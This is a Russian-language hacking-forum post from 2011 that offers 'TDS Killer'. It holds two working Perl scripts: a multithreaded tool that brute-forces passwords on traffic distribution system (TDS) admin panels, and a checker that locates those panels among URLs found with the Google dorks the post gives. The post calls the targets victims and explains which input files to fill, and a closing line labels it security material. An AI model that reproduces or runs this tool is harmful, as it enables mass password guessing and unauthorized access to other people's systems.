TDS Killer (скрипт для массового брута TDS)[perl]

В файл tds.txt кладутся сами url`ы до админок TDS, в login.txt и pass.txt - логины и пароли для перебора соответственно.
Дорки для поиска жертв в Goolge:
Simple TDS - "inurl:go.php?sid="
Advanced TDS - "out.php?s_id="
BruTe

Код:

#!/usr/bin/perl -w
use threads;
use threads::shared;
use LWP::Simple;
$| = 1; 
my $num : shared;
$num = 0;
my @tds : shared;
my @tds_brute : shared;
my @tmp : shared;
##############################################
my $thr = 20;
my $tds_type = 0; #0 - Simple TDS; 1 - Advanced TDS
##############################################
my $ua = LWP::UserAgent->new; 
$ua->agent("Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a"); 
$ua->timeout(5);
print "-----------------------------------------------------------------\n";
print "           [TDS Killer] coded by daniel_1024\n";    	
print "-----------------------------------------------------------------\n";
if ($tds_type == 0) { print "[*] TDS type: Simple TDS\n"; } elsif ($tds_type == 1) { print "[*] TDS type: Advanced TDS\n"; }
open(F, "pass.txt");
while (<F>)
{
	chomp;
	push(@pass, $_);
}
close(F);
$passsize = @pass;
open(F, "tds.txt");
while (<F>)
{
	chomp;
	push(@tds, $_);
}
close(F);
$size = @tds;
$fff = localtime();
print "[*] Brute started at $fff\n[*] Sites loaded: $size\n[*] Passwords loaded: $passsize\n";
sub brute
{
	while (@tds_brute)
	{
    { lock @tds_brute; $curr = shift @tds_brute; }
    if ($tds_type == 0) 
    { 
    	($tmphost, $tmp_pass) = split(/\|/, $curr); 
    	$resp = $ua->post($tmphost,['pass'=>$tmp_pass],)->as_string;
    } elsif ($tds_type == 1) {
    	($tmphost, $tmp_pass, $tmp_log) = split(/\|/, $curr); 
    	$resp = $ua->post($tmphost,['login'=>$tmp_log, 'pass'=>$tmp_pass, 'submit'=>'Login'],)->as_string;
    }
    if ($resp =~ m/$word/) 
    { 
    	if ($tds_type == 0) { print "[!] Host: $tmphost Password: $tmp_pass\n"; }
    	elsif ($tds_type == 1) { print "[!] Host: $tmphost Login: $tmp_log Password: $tmp_pass\n"; }
    }
    { lock $num; $num++; }
    $now = time(); 
    $sec = $now-$start+1;
    $speed = sprintf("%.0f", $num/$sec);
    $proc = sprintf("%.1f", ($num/$size)*100);
    print "Status $proc%     Speed: $speed pps\r"; 
	}
}
if ($tds_type == 0) {
	for $tmppass (@pass)
	{
    for $tmpurl (@tds)
    {
    	my $tmp01 = $tmpurl.'|'.$tmppass;
    	push(@tds_brute, $tmp01);
    }
	}
} elsif ($tds_type == 1) {
	open(F,"login.txt");
	while (<F>)
	{
    if ($_) { chomp; push(@logins,$_); }
	}
	close(F);
	$logsize = @logins;
	for $tmplog (@logins)
	{
    for $tmppass (@pass)
    {
    	for $tmpurl (@tds)
    	{
        my $tmp01 = $tmpurl.'|'.$tmppass.'|'.$tmplog;
        push(@tds_brute, $tmp01);
    	}
    }	
	}
}
$size = @tds_brute;
$num = 0;
$start = time();
if ($tds_type == 0) { $word = "Simple TDS"; }
elsif ($tds_type == 1) { $word = "Admin Area"; print "[*] Logins loaded: $logsize\n";}
for(0..$thr) { $trl[$_] = threads->create(\&brute); }
for(0..$thr) { $trl[$_]->join; }
$fff = localtime();
print "\n[*] Brute finished at $fff\n";

Checker

Код:

#!/usr/bin/perl -w
use threads;
use threads::shared;
use LWP::Simple;
$| = 1; 
my $num : shared;
my @tds : shared;
my @tmp : shared;
##############################################
my $thr = 20;
my $tds_type = 0; #0 - Simple TDS; 1 - Advanced TDS
##############################################
my $ua = LWP::UserAgent->new; 
$ua->agent("Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a"); 
$ua->timeout(5);
print "-----------------------------------------------------------------\n";
print "           [TDS Killer] coded by daniel_1024\n";    	
print "-----------------------------------------------------------------\n";
if ($tds_type == 0) { print "[*] TDS type: Simple TDS\n"; } elsif ($tds_type == 1) { print "[*] TDS type: Advanced TDS\n"; }
open(F, "tds.txt");
while (<F>)
{
	chomp;
	push(@tds, $_);
}
close(F);
$size = @tds;
$num = 0;
print "[*] Sites loaded: $size\n";
if ($tds_type == 0) { $dork = "go.php?sid="; $key = 'Password: <input name="pass" type="password"'; }
elsif ($tds_type == 1) { $dork = "out.php?s_id="; $key = "Authorization"; }
for(0..$thr) { $trl[$_] = threads->create(\&check); }
for(0..$thr) { $trl[$_]->join; }
open(H, ">tds.txt"); truncate(H, tell(H)); close(H);
open(F, ">>tds.txt"); print F "$_\n" for @tmp; close(F);
@tds = @tmp;
sub check
{
	while (@tds)
	{
    { lock @tds; $curr = shift @tds; }
    if (index($curr, $dork) != -1)
    {
    	if ($tds_type == 1) { $curr =~ s/out.php\?s_id=.*/r_admin\/index.php/; }
    	elsif ($tds_type == 0) { $curr =~ s/go.php\?sid=.*/index.php/; }
    	$resp = $ua->get($curr)->as_string;
    	if ($resp =~ m/$key/)
    	{
        { lock @tmp; ; push(@tmp, $curr); }
        { lock $num; $num++; }
    	} 
    }
    print "[*] Found $num TDS...\r";
	}
}
print "\n[*] Saved in tds.txt\n";

Инструкция взлома - Это пособия для безопасности!

Меню навигации

Пользовательские ссылки

Объявление

Информация о пользователе

TDS Killer (скрипт для массового брута TDS)[perl]

Сообщений 1 страница 1 из 1

Поделиться12011-08-31 23:53:11